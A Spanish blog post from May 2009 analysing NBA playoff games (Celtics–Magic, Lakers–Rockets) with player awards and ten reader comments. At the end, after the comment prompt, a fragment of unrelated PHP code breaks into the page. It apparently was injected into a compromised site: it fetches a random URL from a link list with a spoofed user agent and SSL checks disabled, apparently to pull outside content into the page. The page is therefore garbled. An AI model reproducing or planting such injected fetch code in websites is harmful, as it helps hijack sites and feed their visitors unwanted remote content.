Playoffs (12/05/2009): La épica y la lógica

13 de May de 2009 por MagicJohnson32

gdavisstandsPor TheDeerHunter & MagicJohnson32

Son los grandes animadores de los Playoffs este año. Los vigentes campeones acumulan una cifra de bajas que habría hecho bajar los brazos a cualquier otro equipo de la liga. Pero ahí están, armándola noche sí y noche también, dejándolo todo gracias al tan mentado corazón de campeón que, en su caso, no es ningún tópico.

Y Doc Rivers dando lecciones magistrales noche tras noche, toreando todos y cada uno de los problemas que han salido, reinventándose con cada incidencia del juego que se presenta. Anoche, el enésimo “big three”: Pierce, Glen Davis y el ahora redimido Stephon Marbury. Sencillamente maravilloso.

Pero ¿cómo es posible tirar a la basura una renta de 14 puntos en el último cuarto? ¿quedarse 5 minutos sin anotar cuando te estás jugando la vida? ¿qué tu gran estrella anote únicamente 12 puntos en el partido más importante de su vida? Esto no lo explica el corazón ni el talento de los campeones. Todo lo contrario. Lo explica el no tener ese carácter. Tras todo el debate durante la temporada de si Orlando eran o no candidatos, ahí los tenéis. Habría que estar loco para jugarse los cuartos a manos de Rashard Lewis, Turkoglu, Alston… o incluso Dwight Howard. Con Rondo y Allen jugando muy por debajo de sus posibilidades, no volverán a tener otra oportunidad mejor de batir a los Celtics. El golpe es tremendo y de él tendrán que recuperarse en pocas horas.

Por los Celtics, sencillamente genialidad. Perkins tocado te hace un partido poco más o menos al nivel del de Dwight Howard, Glen Davis se come vivo a Lewis, Battie, Gortat o a quien le pongan por delante… y a Marbury, tal y como alguno aventurabais hace poco, le sale el espíritu de aquel All-Star y te revienta el partido en el último cuarto. A todos estos intangibles le añades un casi-triple doble de Pierce y tienes un más que posible finalista del Este. Y quiero ver cómo LeBron es capaz de derrotar estos tíos, que no lo dé nadie por seguro.

lakerswinEn el otro extremo del país, como buenos amigos, los Lakers también se postulan como posible finalista con una soberana paliza a Houston en el 5º. Ni Artest, ni Battier, ni Brooks… nadie estuvo acertado en los Rockets. Salieron bien los de Houston (11-4) pero, esta vez sí, los Lakers tuvieron la paciencia en ataque y la intensidad en defensa necesaria y la adecuada para citas de esta importancia. En lo que ha sido una constante durante toda la temporada, los angelinos atacaron mejor cuando mejor fue su defensa. Y anoche su defensa fue de libro: dejaron a los Rockets en un 32.6% en tiros de campo. A partir del 18-12 favorable a los Rockets, cuatro canastas consecutivas de Kobe lanzaron un parcial demoledor (6-31 en 8 minutos) que dejó el partido sentenciado. Hasta el final fue un mero trámite que engordó la diferencia en el marcador y permitió comprobar que tanto Bynum -titular en lugar de un renqueante Odom- como Farmar pueden aportar más de lo que venían haciendo últimamente.

La madrugada del jueves a viernes se disputarán los sextos partidos de ambas eliminatorias. Habrá que ver si los Celtics son capaces de hacer valer en Orlando su vena épica y si los Lakers se presentan en Houston en forma de Dr. Yekyll o de Mr. Hyde para cerrar de una vez por todas sus eliminatorias.

PREMIOS

MVP: Los caminos de los Playoffs son inescrutables. Glen Davis volvió a erigirse en el jugador decisivo para los Celtics en la victoria lograda por los de Doc Rivers en el quinto partido. Davis jugó 42 minutos, anotó 8 de 16 tiros de campo, 6 de 6 en libres, para 22 puntos, 7 rebotes, 2 asistencias y un parcial de +16 para su equipo con él en cancha.

marburyallenLa sorpresa: Si alguien que no ha visto NBA desde el año 2005 llegase hoy y viese que Stephon Marbury ocupa el apartado de la sorpresa del día por haber anotado 12 puntos, lo consideraría una errata. Así de mal le ha ido al ex Wolves últimamente. El de ayer fue sin duda uno de sus días más felices en mucho tiempo: salió al poco de iniciarse el último cuarto con los Magic 11 arriba, anotó cuatro lanzamientos de larga distancia de forma consecutiva y completó una jugada de 2+1. No es que remontase el partido, ya que la diferencia no bajó de 8 puntos hasta algo más tarde, con Marbury de vuelta al banco, pero su participación fue tan importante como Danny Ainge soñó cuando lo contrató.

La decepción: Van Gundy, Howard, Turkoglu, Lewis, Alston, Pietrus, Redick, Lee… Es decir, los Magic en conjunto, por tirar por la borda una ocasión inmejorable de ponerse por delante 2-3 en su serie contra los Celtics y con la oportunidad de sentenciar el jueves en Orlando. Ganaban por 10 puntos a 5:30 para el final y a partir de entonces no anotaron una sola canasta, únicamente 3 puntos de tiros libres, por los 17 que consiguieron los Celtics. En lo individual, destacó el terrible partido de Artest, quien tras un buen inicio tanto suyo como de su equipo, se dedicó a tirar triples y tiros lejanos sin ningún sentido y finalizó con 9 puntos con 4 de 15 en tiros y 1 sola asistencia.

cubanEl mayor esfuerzo en vano: En medio del naufragio Luis Scola fue capaz de mantener la compostura y firmar 12 puntos, 13 rebotes y 4 asistencias meritorias aunque totalmente inútiles.

RAZONES PARA TRASNOCHAR

– Mavs @ Nuggets (3.00 h). Al rojo vivo se presenta el quinto partido entre Dallas y Denver tras los incidentes del cuarto, cuando familiares y amigos de los jugadores de los Nuggets fueron insultados e incluso desalojados por seguridad y se pudo ver a Mark Cuban gritando a la madre de Kenyon Martin. El ambiente en el Pepsi Center y el regreso de Chris Andersen tras su caso de intoxicación pondrán las cosas muy difíciles a los Mavs para evitar el 4-1.

Comenta

10 comentarios a esta entrada

  1. Txusma dice:
    #1

    Puede ser que el proximo partido lo ganen los Magic pero parece demostrado que no tienen la fortaleza mental suficiente para llevarse un séptimo.
    Eso si, en una final de conferencia Cavs-Celtics, me juego todo mi dinero por el equipo de Lebron, sin dudarlo ni un segundo.

      Citar

  2. MagicJohnson32 dice:
    #2

    Yo creo que los Magic mantienen opciones de ganar los dos partidos. Es lamentable que Dwight lance menos que Rash, Turko y Alston, y dudo que pase lo mismo en lo que queda de eliminatoria. Eso sí, ni ellos ni los Celtics están para plantear mucha batalla a los Cavs. Veo 4-1.

      Citar

  3. aro_pasado_no_newtoniano dice:
    #3

    lo de ocupó el lugar de un renqueante Odom ¿es un eufemismo?

      Citar

  4. kantonyo dice:
    #4

    Estoy de acuerdo con Magic, no es comprensible que Orlando no aproveche más la capacidad ofensiva de Howard.

    Los Cavs han demostrado una fiabilidad extrema contra equipos de bajo y medio nivel, pero no así contra equipos de la zona alta, por lo tanto es muy temprano para hablar de paliza contra Magic o Celtics en la final del Este. Cleveland tendrá que demostrarlo en su momento.

      Citar

  5. MagicJohnson32 dice:
    #5

    ¿Eufemismo de qué? Odom estaba bastante tocado de la espalda.

      Citar

  6. couxe dice:
    #6

    Estoy con Kantonyo en lo relativo a los Cavs…
    Hasta ahora no han sufrido ni el más mínimo contratiempo o dificultad en sus dos primeras series. Es cierto que la mayor parte de que esto no suceda es por propios méritos, pero también es cierto que los rivales en nada han ayudado a hacerles sufrir, y los Cavs sencillamente se han dedicado a jugar todos los partidos con una intensidad elevada y constante, cosa que les ha servido para ganar fácil.
    Para mí ahora mismo son los favoritos, por juego, y sobre todo por algo que apenas se menciona, tienen la tremenda suerte de disponer de toda la plantilla en perfectas condiciones, diría que el único equipo de play off que puede decir eso…
    Ahora bien, si como parece se juegan la final de conferencia frente a Boston, o muy equivocado estoy, o no creo que vayan a ganar fácil… más bien diría que serán favoritos pero tendrán que sudar mucho más de lo que lo han hecho hasta ahora…

    Por cierto, muchas veces todos nosotros hemos visto cómo en torneos de cualquier deporte, individual o colectivo, un favortio arroya y gana con la gorra en las primeras rondas dando la impresión de ser imbatible… y en cuanto llega la primera dificultad, al no estar acostumbrado a sufrir demasiado, las pasa putísimas o directamente se va a la calle…

      Citar

  7. Jabho dice:
    #7

    Bufff, que gustazo el partido de ayer y los Play Offs de los Celtics.

    Por un lado lo que habéis dicho, Rondo y Allen mal partido. Especialmente el de Rondo que le falta la madurez para tomarse las cosas con calma cuando no salen las cosas. Ray sin embargo mal partido, una racha horrible de triples, pero con 2 abajo (83-85) quién se juega el triple decisivos para ponerse por delante???

    Pierce muy bien los 3 primeros cuartos y Marbury crucial cuando estaba descansando Pierce en el 4º. Venía avisando el bueno de Starbury… el que le haya visto cuando se incorporó a los Celtics era casi un ex jugador, sin confianza ni forma ni nada. Poco a poco, algún momento contra los Bulls y más contra los Magic se le ve que va cogiendo el punto. Y actitud y defensa muy, muy bien. Si sigue así y quiere renovar por poco se lo ha ganado.

    Lo de Glen Davis no tiene nombre… craaaaack!!!!

    Por los Magic que decir. Lewis llevaba algo así como 8-10 en tiro en los 3 primeros cuartos y perdí la cuenta en el 0-7 en el 4º… tuvo un par de triples completamente solo en los momentos decisivos y uno no toca ni aro…

    En fin que si, que pueden pasar los Magic porque son mejores. Boston se tiene que dejar la piel para estar en el partido, en cada acción. Para compensar el desequilibrio en los tableros apelamos a la épica como decís… joder, si Scalabrini está jugando minutos importantes estos PO… pero creo que aunque eliminen a Boston los grandes derrotados de la serie serán los Magic. Dan sensación de debilidad y eso no es bueno. Su propia confianza estará minada.

    Boston no tiene ninguna opción ahora mismo contra los Cavs. Ninguna si todo sigue igual. Pero si pasamos se lo pondremos difícil seguro. Y como dije ayer, a ver como reaccionan ante las dificultades que de momento no han tenido. Además te ganas el derecho a soñar, porque ¿Y si luego se lesionará LeBron? Y ojo, que no quiero que pase eso. Creo que la final debe ser Cavs-Lakers con todos los buenos jugando, pero me hubiera gustado ver los PO con Garnett y Powe en el equipo.

    Los Lakers no sé, como el año pasado. Demasiado irregulares… no me gusta como pinta. A ver si se ponen las pilas pero no tiene buena pinta a pesar de ganar ayer de paliza. Boston demuestra caracter sin su máxima estrella y demuestra que es un equipo hecho, solvente, competitivo. Los Lakers en demasiadas ocasiones se dejan llevar… No mola.

    Y para acabar, chapeau a Glen Doc Rivers. Confirmado, ahí hay un entrenador.

      Citar

  8. aro_pasado_no_newtoniano dice:
    #8

    Pensaba que estar renqueante era un eufesmismo de rémora. Pero si le dolía la espalda, Dios lo acoja en su seno.

      Citar

  9. MagicJohnson32 dice:
    #9

    Sí que le dolía, y mucho. Menudo costalazo se dio en el 4º partido… No esperaba verlo de corto en éste. Vamos, que cuando dije renqueante quise decir renqueante, jeje.

    JABHO ¿Lakers como el año pasado? El año pasado los Lakers hicieron unos Playoffs sensacionales hasta las Finales. Barrieron a Denver (4-0), supieron sufrir ante unos buenos Jazz (4-2) e hicieron una serie fantástica contra los Spurs (4-1). Nada que ver con lo de este año, creo yo.

      Citar

  10. Jabho dice:
    #10

    Magic, estaba pensando en los Lakers de las finales. Esos que jugaban 10 minutos de cine y luego se iban del partido.

    Posiblemente hoy pasaran los Lakers y mirándolo con distancia será 4-1 en 1ª ronda y 4-2 en 2ª. El problema es de sensaciones (y he visto muy poco). La sensación es que determinados partidos, o momentos de los partidos, pasan de jugarlos… Parece un problema de concentración o de falta de actitud en algunos momentos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>